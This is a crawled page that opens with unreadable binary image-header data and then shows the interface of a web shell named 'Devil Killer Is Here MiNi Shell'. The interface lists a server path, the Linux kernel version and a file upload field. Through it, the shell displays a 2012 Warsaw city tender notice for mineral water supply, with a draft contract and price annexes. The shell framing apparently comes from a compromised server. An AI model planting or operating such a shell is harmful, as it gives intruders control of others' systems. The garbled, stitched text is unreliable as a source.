JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120425/94339-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa wody mineralnej na potrzeby Urzędu m. st. Warszawy</b><br>
<b>Numer ogłoszenia: 94339 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa , Pl. Bankowy 3/5, 00-950 Warszawa, woj. mazowieckie, tel. (+48 22) 443 14 00, faks (+48 22) 443 14 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wody mineralnej na potrzeby Urzędu m. st. Warszawy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa wody mineralnej na potrzeby Urzędu m. st. Warszawy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 3900 zł. Wadium nie wnosi się na etapie skladania wniosków o dopuszczenie do licytacji</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-dokument (np. pełnomocnictwo, odpis z właściwego rejestru - np. Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczpospolitej Polskiej, zaświadczenie o wpisie do ewidencji działalności gospodarczej lub umowa spółki cywilnej, itp.) zawierający dane aktualne na dzień składania wniosków, potwierdzający, że wniosek został podpisany przez osobę właściwie umocowaną, jeżeli nie wynika to z innych dokumentów załączonych do wniosków; pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków; Wykonawca zagraniczny składa dokumenty zgodnie z zapisami powyżej ze szczególnym uwzględnieniem, aby dokumenty złożone wraz z wnioskiem potwierdzały, iż wniosek został podpisany przez osobę/y uprawnioną/e do reprezentowania Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://aukcje.um.warszawa.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://ogłoszeniabzp.um.warszawa.pl/wyszukiwarka/php</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Zamawiający przekazuje zakwalifikowanym Wykonawcom zaproszenie do udziału w licytacji elektronicznej. Zaproszenie zostanie przekazane drogą elektroniczną na adres wskazany we wniosku o dopuszczenie do udziału w licytacji. Treść zaproszenia zawierać będzie adres strony internetowej, na której odbywać się będzie licytacja oraz parametry licytacji elektronicznej takie jak: data i godzina otwarcia, czas trwania i warunki zamknięcia licytacji. Operator platformy aukcyjnej wyśle na adres e-mail osoby wskazanej we wniosku o dopuszczenie do udziału w postępowaniu wiadomość wraz z instrukcją obsługi platformy aukcyjnej. Następnie, w terminie wyznaczonym w treści wiadomości, dla wykonawców zaproszonych do udziału w licytacji elektronicznej zostanie zdefiniowana licytacja testowa. W trakcie licytacji testowej, dla zainteresowanych wykonawców, operator platformy przeprowadzi telefoniczne szkolenie dotyczące zasad korzystania z platformy aukcyjnej, w czasie którego zostaną omówione zasady postępowania w trakcie licytacji elektronicznej. Wykonawca chcący wziąć udział w licytacji elektronicznej musi dysponować sprzętem, spełniającym poniższe wymagania: -procesor 733 MHz i co najmniej 512 MB pamięci RAM -zainstalowany system operacyjny MS Windows XP lub nowszy -zainstalowana przeglądarka internetowa Microsoft Internet Explorer 6.0. lub nowsza albo Mozilla Firefox 2.x lub nowsza -połączenie z siecią Internet o szybkości transmisji nie mniejszej niż 128 kb/s..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> W trakcie licytacji Wykonawca podaje cenę brutto (z VAT) za wykonanie całego zamówienia. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim wykonawcom informacje o pozycji składanych przez nich ofert, liczbie wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. Minimalna wysokość postąpienia 1000,00 zł.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 15min</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 04.05.2012 godzina 12:00, miejsce: Biuro Zamówień Publicznych Urzędu m. st. Warszawy ul. Senatorska 36, pok. 12, IV p. 00-095 Warszawa.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 11 maja 2012r., godz. 12:00. Ostateczny termin licytacji Zamawiający poda w zaproszeniu do udziału w licytacji.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Zamawiający zamyka licytację, gdy w podstawowym czasie nie zostanie złożona żadna oferta lub, gdy w ciągu 3 minut od złożenia ostatniej oferty nie zostanie złożona kolejna, jednakże nie wcześniej niż po upływie 15 minut od otwarcia licytacji</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Umowa nr AG_______________o zamówienie opłacane ze środków m. st.  Warszawy

zawarta w dniu  ____________________w Warszawie pomiędzy:Miastem Stołecznym Warszawa, zwanym dalej Zamawiającym z siedzibą w Warszawie, Pl. Bankowy 3/5, 00-950 Warszawa, które reprezentują:1.________________________ - _____________________________, 
na podstawie udzielonego pełnomocnictwa przez Prezydenta m. st. Warszawy 
Nr GP-_____________z dnia____________, 2.__________________________ - _____________________, na podstawie udzielonego pełnomocnictwa przez Prezydenta m. st. Warszawy Nr GP_____________ z dnia ____________r. 	
a______________________, zwanym dalej Wykonawcą,______________________________________________postępowania o zamówienie publiczne nr ZP/___________, przeprowadzonego w trybie ____________  na podstawie art. _____ustawy z dnia 29 stycznia 2004 r.  Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.), została zawarta umowa następującej treści:
§ 1Przedmiot umowy1.Przedmiotem umowy jest sukcesywna dostawa przez Wykonawcę do siedzib Zamawiającego wody mineralnej na potrzeby Urzędu m.st. Warszawy, zgodnie z formularzem cenowym z dnia ____ r. 2.Woda mineralna, o której mowa w ust. 1 musi spełniać następujące warunki: a)suma składników mineralnych nie mniejsza niż 700 mg/l i nie większa niż 1500 mg/l, w tym:-magnez (Mg) -  nie mniej niż 20 mg/l ,wapń (Ca)- nie mniej niż 100 mg, sod (Na)- nie więcej niż 200 mg/l. b)posiadać aktualną pozytywną ocenę jakości, sporządzoną przez Państwowy Zakład Higieny zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 31 marca 2011 r. w sprawie naturalnych wód mineralnych, naturalnych wód źródlanych i wód stołowych (Dz. U. z 2011 r. Nr 85, poz. 466 ). c)termin przydatności do spożycia nie krótszy niż do 31 marca 2013 roku.d)dostarczana w opakowaniach zbiorczych:woda niegazowana(butelki 1,5 l  PET)     pakowane po   6 szt.woda gazowana 	(butelki 1,5 l  PET)     pakowane po   6 szt.woda gazowana	(butelki 0,5 l  PET)     pakowane po 12 szt.woda niegazowana(butelki 0,5 l  PET)     pakowane po 12 szt.woda niegazowana(butelki 0,7l   PET)    pakowane po 6 lub 8 szt.3.Parametry wody, o których mowa w ust. 2 a) nie mogą ulec pogorszeniu w okresie obowiązywania umowy.4.Informacje, o których mowa w ust. 2 a) b) i c) muszą znajdować się na etykiecie umieszczonej na każdej dostarczonej butelce.§ 2Termin realizacji przedmiotu umowy Przedmiot umowy będzie zrealizowany w terminie od dnia zawarcia umowy do dnia 5 grudnia 2012r. lub do wyczerpania kwoty, o której mowa w § 3 ust. 1 umowy, w przypadku, gdy kwota ta ulegnie wyczerpaniu przed 5 grudnia 2012 r. § 3Wynagrodzenie, płatności
1.Strony ustalają, iż łączne wynagrodzenie za wykonanie przedmiotu umowy, o którym mowa w § 1 nie przekroczy kwoty brutto __________ zł(słownie:_________ złotych  ___/100). 2.Ostateczna wysokość wynagrodzenia, o którym mowa w ust. 1, wynikać będzie z iloczynu ilości faktycznie dostarczonej wody mineralnej przez Wykonawcę oraz cen jednostkowych określonych w formularzu cenowym, stanowiącym załącznik nr 1 do umowy i nie przekroczy sumy wskazanej w ust. 1.
3.Ceny jednostkowe, o których mowa w formularzu cenowym zawierają w sobie koszty transportu, koszty związane z dostawą (rozładunkiem) do miejsc wskazanych przez Zamawiającego, ubezpieczeń, opłaty celne i podatkowe oraz wszelkie inne koszty Wykonawcy, przy czym ceny jednostkowe przez cały okres obowiązywania umowy, nie ulegną podwyższeniu. 4.Zapłata wynagrodzenia Wykonawcy za realizację przedmiotu umowy będzie dokonywana częściami w formie przelewu - na podstawie faktur wystawionych po wcześniejszym dostarczeniu części przedmiotu umowy, potwierdzonym przez osobę odpowiedzialną za realizację umowy ze strony Zamawiającego, wskazanej w § 5 ust. 1.
5.Faktury, o których mowa w ust. 4, będą realizowane w formie przelewu na rachunek bankowy Wykonawcy: _______________, w terminie do 21 dni, od daty złożenia prawidłowo wystawionej faktury w Biurze Administracyjno-Gospodarczym Urzędu m.st. Warszawy, po ich uprzednim sprawdzeniu pod względem merytorycznym i rachunkowym. Wykonawca zobowiązuje się złożyć ostatnią fakturę w Biurze Administracyjno-Gospodarczym Urzędu m.st. Warszawy do dnia 7 grudnia 2012 r., która zostanie zapłacona do dnia 31 grudnia 2012 r.
6.Wykonawca będzie wystawiał faktury na: Miasto Stołeczne Warszawa,
Pl. Bankowy 3/5, 00 950 Warszawa, NIP 525-22-48-481. 7.Za dzień dokonania płatności strony będą uznawać dzień obciążenia rachunku Zamawiającego.  §4 Sposób wykonania umowy 1.Wykonawca zobowiązuje się do wykonania przedmiotu umowy w sposób fachowy, sprawny i rzetelny. 2.Wielkość, miejsce i czas dostarczenia każdej partii wody mineralnej będzie wynikać z jednostronnej dyspozycji osób odpowiedzialnych za realizację przedmiotu umowy po stronie Zamawiającego, która zostanie przesłana Wykonawcy faksem lub e-mailem. 
3.Realizacja zamówienia nastąpi nie później niż w ciągu 3 dni kalendarzowych od dnia otrzymania zamówienia przesłanego faksem lub e-mailem. 4.Zamawiający w toku realizacji umowy zastrzega sobie prawo do rezygnacji z części zamawianego asortymentu oraz zmiany ilości poszczególnych asortymentów na inne, objęte zamówieniem - przy zachowaniu cen jednostkowych podanych przez Wykonawcę w załączniku nr 1 do umowy. 5.Rzeczywista ilość zamawianej wody mineralnej wynikać będzie z potrzeb Zamawiającego. 6.Wykonawca zobowiązany jest do dostawy i rozładunku przedmiotu umowy na terenie siedzib Urzędu m.st. Warszawy, we wskazanym przez Zamawiającego miejscu. 7.Osoba odpowiedzialna dokona odbioru ilościowego dostarczonej wody mineralnej i w razie stwierdzenia niezgodności ze złożonym zapotrzebowaniem, złoży pisemną reklamację do Wykonawcy w terminie do 3 dni od ich stwierdzenia - faksem lub e-mailem.
8.Zamawiający zastrzega sobie prawo do sprawdzenia przestrzegania przez Wykonawcę wymogów określonych w § 1 ust. 2 w okresie obowiązywania umowy.
9.Wykonawca rozpatrzy reklamację i udzieli odpowiedzi w ciągu 2 dni od dnia otrzymania zgłoszenia, przy czym odmowa uwzględnienia reklamacji wymaga pisemnego uzasadnienia pod rygorem skutków przewidzianych w § 6 umowy.
10.Po bezskutecznym upływie tego terminu, reklamację uważa się za uznaną zgodnie z żądaniem Zamawiającego. 11.W przypadku braków asortymentowych, Wykonawca w ciągu 24 godzin od otrzymania zgłoszenia uzupełni brakującą ilość wody mineralnej. 12.Wykonawca zobowiązuje się dostarczać wodę w butelkach o pojemności określonej w formularzu cenowym stanowiącym załącznik nr 1 do umowy. § 5Współpraca 1.Ze strony Zamawiającego osobami odpowiedzialnymi za prawidłowe wykonanie umowy są:   _________ tel. ______,e-mail:  _________@um.warszawa.pl ___________________ tel. _______________, e-mail: ____________@um.warszawa.pl 2.Ze strony Wykonawcy osobami odpowiedzialnymi za prawidłowe wykonanie umowy są:___________________ tel. _____________, e-mail:  _____________@__________, ___________________ tel. _____________, e-mail:  _____________@____________ 3.Zmiana osoby do współpracy ze strony Zamawiającego i Wykonawcy wymaga poinformowania o tym fakcie drugiej strony w trybie zawiadomienia pisemnego. 4.Strony wskazują następujące adresy do doręczeń: Zamawiający: ul. Senatorska 27, 00-099 Warszawa, Wykonawca: ____________________________5.Strony zobowiązują się do niezwłocznego zawiadomienia o wszelkich zmianach adresu do doręczeń, pod rygorem uznania doręczenia na ostatni wskazany adres za skuteczne. § 6Kary umowne 1.Strony ustalają odpowiedzialność za niewykonanie lub nienależyte wykonanie umowy w formie kar umownych. 2.Wykonawca zapłaci Zamawiającemu karę umowną w przypadku: a)Rozwiązania umowy przez którąkolwiek ze stron z przyczyn leżących po stronie Wykonawcy, a także w przypadku nienależytego wykonywania umowy - w wysokości 10% wynagrodzenia brutto, 
o którym mowa w § 3 ust. 1, b) Nieterminowej realizacji przedmiotu umowy przez Wykonawcę, zgodnie z postanowieniami zawartymi w § 4 - w wysokości 0, 1 % wynagrodzenia brutto, o którym mowa w § 3 ust. 1, za każdy rozpoczęty dzień zwłoki. 3.Zamawiający zastrzega sobie prawo dochodzenia na zasadach ogólnych odszkodowania przenoszącego wysokość kar umownych do wysokości rzeczywiście poniesionej szkody. 4.Zamawiający może w razie wystąpienia zwłoki w wykonywaniu umowy, wyznaczyć dodatkowy termin wykonania przedmiotu umowy, nie rezygnując z kary umownej i odszkodowania. 5.Kary umowne, o których mowa w ust. 2 podlegają łączeniu. 6.O naliczeniu kar umownych Zamawiający informuje pisemnie Wykonawcę, określając jednocześnie termin uiszczenia kwoty z tytułu naliczonych kar oraz podając formę uregulowania należności. 7.W przypadku uchylania się Wykonawcy od terminowej zapłaty kar umownych, Zamawiający potrąca je z kwoty należnej do zapłaty Wykonawcy  (określonej fakturą), na co Wykonawca wyraża zgodę. § 7Rozwiązanie umowy Zamawiający może rozwiązać umowę bez zachowania okresu wypowiedzenia, jeżeli Wykonawca: a)Nie rozpoczął realizacji przedmiotu umowy lub przerwał i jej nie wznowił przez okres dłuższy niż 7 dni od daty otrzymania dyspozycji, o której mowa w § 4 ust. 2 i ust. 3 umowy; b)Wykonuje prace niezgodnie z postanowieniami umowy; c)Wykonuje wadliwie przedmiot umowy. § 7Postanowienia dodatkowe 1.Wykonanie niniejszej umowy nie wiąże się z  przetwarzaniem  danych w rozumieniu ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926 z późn. zm.), dla których Administratorem Danych jest Prezydent m.st. Warszawy, a co za tym idzie nie wiąże się z dostępem do zasobów systemów informatycznych Urzędu m.st. Warszawy. 2.Wykonawca oświadcza, że znany jest mu fakt, iż treść niniejszej umowy, a w szczególności dotyczące go dane identyfikujące, przedmiot umowy i wysokość wynagrodzenia, stanowią informację publiczną w rozumieniu art. 1 ust. 1 ustawy z dnia   6 września 2001 r. o dostępie do informacji publicznej (Dz. U. z 2001 r. nr 112, poz. 1198 z późn. zm.), która podlega udostępnianiu w trybie przedmiotowej ustawy. 3.Spory wynikające z umowy rozpatrywać będzie sąd właściwy miejscowo dla siedziby Zamawiającego.
4.Wszelkie zmiany niniejszej umowy wymagają formy pisemnej i zgody obu stron pod rygorem nieważności. 5.W sprawach nieuregulowanych niniejszą umową mają zastosowanie odpowiednio przepisy ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.)  i  ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz. U. 1964 Nr 16, poz.93 z późn. zm.) 6.Umowę sporządzono w czterech jednobrzmiących egzemplarzach, w tym trzy egzemplarze dla Zamawiającego i jeden egzemplarz dla Wykonawcy. § 8Załączniki Załącznik  Nr 1 - Formularz cenowy z dnia _____________ r., Załącznik  Nr 2 - Zakres przedmiotu Umowy dla BAG Załącznik  Nr 3 - Zakres przedmiotu Umowy dla GP Załącznik  Nr 4 - Zakres przedmiotu Umowy dla CKS ZAMAWIAJĄCY WYKONAWCA





























Załącznik nr 1 do umowy

Formularz cenowy



Lp.	
Przedmiot zamówienia	Cena jednostkowa brutto	
Liczba sztuk	
Wartość brutto
1 	woda mineralna  1,5 l  PET  niegazowana   		40000,00
	
2	woda mineralna  1,5 l  PET  gazowana        		40000,00
	
3	woda mineralna   0,5 l  PET  niegazowana   		36000,00
	
4	woda mineralna   0,5 l  PET  gazowana        		11 200,00
	
5	woda mineralna   0,7 l  PET  niegazowana   		13200,00	
RAZEM	































Załącznik Nr 2 do Umowy nr AG/B/X/2/1/__________/_____________
dla Biura Administracyjno - Gospodarczego Urzędu m.st. Warszawy



1. Zakres przedmiotu umowy dla Biura Administracyjno - Gospodarczego Urzędu m.st. Warszawy:
   

L.p.	Nazwa asortymentu	Jedn. miary	Ilość szacunkowa
1	Woda mineralna niegazowana	1,5 litra	  40 000
2	Woda mineralna gazowana	             1,5 litra	  40 000
3	Woda mineralna niegazowana	0,5 litra	-
4	Woda mineralna gazowana	            0,5 litra	-


2 Wielkość, miejsce i czas dostarczenia każdej partii wody mineralnej będzie wynikać      z jednostronnej dyspozycji osób odpowiedzialnych za realizację przedmiotu umowy po stronie Zamawiającego, przesłanej Wykonawcy faksem lub e-mailem.
                                                

3. Płatnik/ Odbiorca: 
Miasto Stołeczne Warszawa,
Pl. Bankowy 3/5,00-950 Warszawa
NIP 525-22-48-481

4. Komórka organizacyjna Urzędu m. st. Warszawy właściwa do zamawiania i potwierdzania realizacji dostaw wody w zakresie objętym niniejszym załącznikiem:
     - Biuro Administracyjno - Gospodarcze Urzędu m.st. Warszawy
     - osoba odpowiedzialna: ___________________________

5. Wynagrodzenie w zakresie objętym niniejszym załącznikiem w wysokości nie przekraczającej kwoty łącznej:
- ogółem kwota brutto _____________zł (słownie:___________________złotych 00/100) 




                          Wykonawca                                    Zastępca Dyrektora
                                                                      Biura Administracyjno - 
                                                                              Gospodarczego 
						                                                              Urzędu m. st. Warszawy





Załącznik Nr 3 do Umowy nr AG/B/X/2/1/_____________
dla Gabinetu Prezydenta Urzędu m.st. Warszawy




1. Zakres przedmiotu umowy dla Gabinetu Prezydenta Urzędu m.st. Warszawy:
   

L.p.	Nazwa asortymentu	Jednostka miary	Ilość szacunkowa
1	Woda mineralna niegazowana	0,5 litra	36 300 
2	Woda mineralna gazowana	             0,5 litra	 11 200 


2. Wielkość, miejsce i czas dostarczenia każdej partii wody mineralnej będzie wynikać   z jednostronnej dyspozycji osób odpowiedzialnych za realizację przedmiotu umowy po  stronie Zamawiającego, przesłanej Wykonawcy faksem lub e-mailem.


3. Płatnik/ Odbiorca:                    Miasto Stołeczne Warszawa,
